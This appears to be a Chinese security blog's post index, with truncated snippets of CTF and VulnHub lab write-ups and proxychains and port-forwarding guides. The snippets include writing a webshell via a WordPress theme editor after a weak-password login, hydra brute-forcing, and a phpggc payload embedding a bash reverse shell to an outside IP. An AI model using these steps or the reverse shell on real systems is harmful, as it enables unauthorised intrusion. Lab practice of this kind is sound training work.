- 2024-08-25春秋云镜 网鼎杯2022半决赛
现用fscan扫一下访问发现是个wordpress,wpscan一下版本为6.2.6,使用了twentytwentyonetheme后台弱密码admin/123456登录由于存在themefileeditor,因此可以写马随便找一个php文件,写入木马.使用蚁剑连接,路径之前wpscan给出来了.得到了第一个flagflag:flag{c0af2d0
- 2024-07-31SkyTower靶机
靶机地址:SkyTower:1~VulnHub一、信息收集步骤一:将攻击机kali和靶机均设为桥接模式,此时靶机的MAC地址为:步骤二:确定目标主机arp-scan-l得到目标主机IP为192.168.7.61步骤三:查看开放的端口nmap-sV-p-192.168.7.61步骤四:浏览器访问步骤五:目录扫描,无有用信息d
- 2023-11-13netsh、ssf、proxychains、netsh端口转发
端口转发1本地端口转发(正向代理)实验kali:192.168.9.16ubuntu:192.168.9.15ubuntu2:192.168.9.10首先就是主机安装ssh工具,用ssh做端口转发kali开启ssh服务,需要下载openssh-serverapt-getinstallopenssh-server然后开启ssh服务servicesshstart然后配置可使用密
- 2023-11-10春秋云镜 Flarum WP
春秋云镜FlarumWPadministrator、1chrishttps://www.leavesongs.com/PENETRATION/flarum-rce-tour.html生成反弹shell的payloadphpphpggc-ptar-bMonolog/RCE6system"bash-c'bash-i>&/dev/tcp/114.96.104.240/66660>&1'"根据文章复
- 2023-10-06macOS上proxychains使用注意事项
在使用brew安装的proxychains的时候,配置文件位于/usr/local/etc/proxychains在高版本macos上,默认启用了SIP保护,所以/usr/bin/目录下的文件无法使用proxychains解决办法:3.1关闭SIP保护首先重启Mac,按住Option键进入启动盘选择模式按⌘+R进入Recovery模式在屏幕的最
- 2023-06-24三层靶机内网渗透测试
三层靶机内网渗透测试信息收集目标ip:192.168.31.145端口信息收集:nmap-A-T4-p- 192.168.31.145开放端口:21/22/80/111/888/3306/8888 操作系统:Liunx分析利用21/22端口--弱口令爆破hydra-vV-lroot-P/usr/share/wordlists/metasploit/password.lst 192.1
- 2023-05-30Kali内置代理工具Proxychains的简单使用
1.介绍Kali中内置了ProxyChains开源代理工具,通过使用这个工具,可以让我们隐藏真实ip实现攻击、代理上网等使用ProxyChains,用户可以在KaliLinux中配置不同类型的代理服务器,包括HTTP、SOCKS4和SOCKS5代理。此外,用户还可以为不同的目标指定不同的代理服务器,以确保他们的行为不被检
- 2023-05-03记一次Visual Studio启动WSL远程调试的方法
安装wsl的方法在此就不提了,就说几点注意事项就行了Internal选项里记得打开tls1.2,不然store打开很可能报错然后在store里安装好Ubuntu后,记得先打开ps然后运行wsl--update然后在打开Ubuntu设置账号密码等安装好后,第一步就是sudoapt-getupdate,sudoapt-getupdateupgrade
- 2023-03-18linux下的全局代理工具proxychain
proxychain介绍本文介绍的是proxychains-ng项目在linux上运行一些命令的时候,经常访问到国外的网站,速度非常的慢,例如用git、wget等等,这个时候就可以通过proxychain工
- 2023-02-27vulnhub靶场之WORST WESTERN HOTEL: 1
准备:攻击机:虚拟机kali、本机win10。靶机:WorstWesternHotel:1,下载地址:https://download.vulnhub.com/worstwesternhotel/HotelWW.ova,下载后直接vbox打开即可。知识点:s
- 2022-12-12linux命令行代理神器-proxychains
https://zuoer.xin/?post=72 什么是 proxychains-ng项目主页:https://github.com/rofl0r/proxychains-ng proxychains-ng 介绍proxychainsng(newgeneration
- 2022-11-24kali linux 设置proxychains 代理
因为kali自带proxychains工具直接修改/etc/proxychains.conf配置文件直接修改socks4 127.0.0.1 1080值得注意的是在ssr上开启允许局域网上连接参考连接:https://w
- 2022-11-24ubuntu等debian系linux系统添加人脸识别howdy
准备proxychainsproxychains是用来给终端走代理的软件,因为下载howdy的时候有一部分的文件的服务器在国外,且被墙了。安装proxychainssudoaptinstallproxychains配
- 2022-10-21靶机: medium_socnet
靶机:medium_socnet准备工作需要你确定的事情:确定kali已经安装,并且能正常使用【本文不涉及kali安装配置】VirtualBox以前能正常导入虚拟文件ova能正常使用下